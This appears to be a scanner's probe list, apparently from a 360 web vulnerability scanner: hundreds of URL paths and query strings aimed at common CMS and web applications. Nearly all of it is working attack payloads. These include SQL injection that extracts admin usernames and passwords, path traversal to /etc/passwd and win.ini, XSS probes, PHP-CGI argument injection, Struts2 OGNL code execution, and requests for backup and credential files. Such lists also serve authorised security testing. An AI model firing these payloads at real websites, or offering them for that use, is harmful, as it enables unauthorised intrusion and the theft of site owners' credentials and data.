/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/pass.txt
/passwd
/password.txt
/passwords.txt
/users.txt
/users.ini
/admin.cfg
/install.log
/database.inc
/common.inc
/db.inc
/connect.inc
/conn.inc
/sql.inc
/.bash_history
/.bashrc
/Web.config
/Global.asax
/Global.asa
/Global.asax.cs
/data.mdb
/domcfg.nsf
/names.nsf
/log.nsf
/domlog.nsf
/.rediscli_history
/data/%23data.mdb
/config.inc.php.bak
/config/config_ucenter.php.bak
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/data/common.inc.php.bak
/wp-config.php.bak
/WEB-INF/database.properties
/
/robots.txt
/
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/
/nevercouldexistfilenosec
/nevercouldexistfilewebsec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilenosec.shtml
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec/
/nevercouldexistfilenosec.zip
/nevercouldexistfilewebsec.zip
/nevercouldexistfilenosec.php
/nevercouldexistfilewebsec.php
/nevercouldexistfilenosec.bak
/nevercouldexistfilewebsec.bak
/nevercouldexistfilenosec.rar
/nevercouldexistfilewebsec.rar
/
/jsky_web_scanner_test_file.txt
/nosec_Web_Scanner_Test.dll
/
/wp-admin
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/admin.php
/dede/
/administrator/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/user
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/TRACE_test
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/TRACK_test
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/_vti_bin/_vti_adm/admin.dll
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/_vti_bin/_vti_aut/author.dll
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/_vti_bin/shtml.exe?_vti_rpc
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/server-info
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/server-status
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/jmx-console/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/web-console/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/webscan360noThisFile*~1*/.aspx
/cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/.../.../.../.../.../.../.../.../windows/win.ini
/cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/phpMyAdmin/show_config_errors.php
/etc/passwd
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/etc/passwd
/xampp/index.php
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/?search=just_test_not_find_href
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/$
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/solr/dev/admin/
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/.../.../.../.../.../.../.../.../etc/passwd
/level/15/exec/-/show/running-config/CR
/plugins/weathermap/weathermap-cacti-plugin.php
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/icons/index
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/icons/small/index
/%3Cscript%3Ealert(42873).do
/
/%3Cscript%20s%3Ealert(42873)
/
/?%22onmouseover='prompt(42873)'bad=%22%3E
/
/%22%3E%3CsCrIpT%3Eprompt(42873)
/
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/
/'IHLD
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/
/
/install.php
/
/install/index.php
/
/fckeditor/editor/dialog/fck_about.html
/
/extras/curltest.php?url=file://curltest.php
/
/.svn/entries
/
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/
/plus/carbuyaction.php
/
/plus/carbuyaction.php?dopost=return&code=../../index
/
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/yp/product.php?q=&action=searchlist&where=%23
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/_database/qiye_free.asp
/apps/include.php?file=index.php
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/manage/login.php
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/Inc/conn.asp
/user/reg3.php
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/ask/search_ajax.php?q=s%bb%27
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/web/?id=-1'
/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
/js/calendar.php?lang=../js
/xampp/showcode.php/showcode.php?showcode=1
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/login.php
/admin/index.asp
/Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/phpcms/data/js.php?id=1
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?user-getpass-1'
/?user-space-1'
/index.php
/admin/sysadmin_view.asp
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/index.php?user-getpass
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/register.php?do=submit
/management/login.asp
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/tools/ajax.aspx
/show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/bom.php?dir=.
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/myly.aspx?username=test'%20and%20@@version%3E0--
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/?product-gnotify
/Index.action
/index.action
/login.action
/index.php/api/xmlrpc
/CVS/Root
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/group/group.php?id=1%27webscan_draGxn
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/upload/flow.php?step=update_cart
/user.php?act=is_registered&username=%CE%27360webscan%23
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/zhuti/360webscan'
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/WEB-INF/web.xml
/api.php?action=File&ctrl=download&path=api.php
/?/people/360webscan?notification_id-360webscan'
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admin/manageAPP.php
/index.php?m=poster&c=index&a=poster_click&id=1
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/?/search/ajax/search_result/search_type-all__q-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/do/s_rpc.php
/new2/s_rpc.php
/video/s_rpc.php
/photo/s_rpc.php
/news/s_rpc.php
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/page/html/?360webscan'.html
/Admin/sqlPlatform/operateSql.aspx
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/ckeditor/samples/sample_posteddata.php
/plus/carbuyaction.php?dopost=return&code=../../tags
/?cart-ajaxadd
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/index.php?ac=order&at=list
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/m.php?m=User&a=doLogin
/api.php?act=1&appname=../../core/html/pages/about.html%00
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/message.php?act=webscan'
/link.php?act=go&url=webscan.cn'
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/index.asp
/admin_aspcms/_style/aspcms_stylefun.asp?action=edit
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/resin-doc/viewfile/?file=index.jsp
/portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/api/uc_client/control/mail.php
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
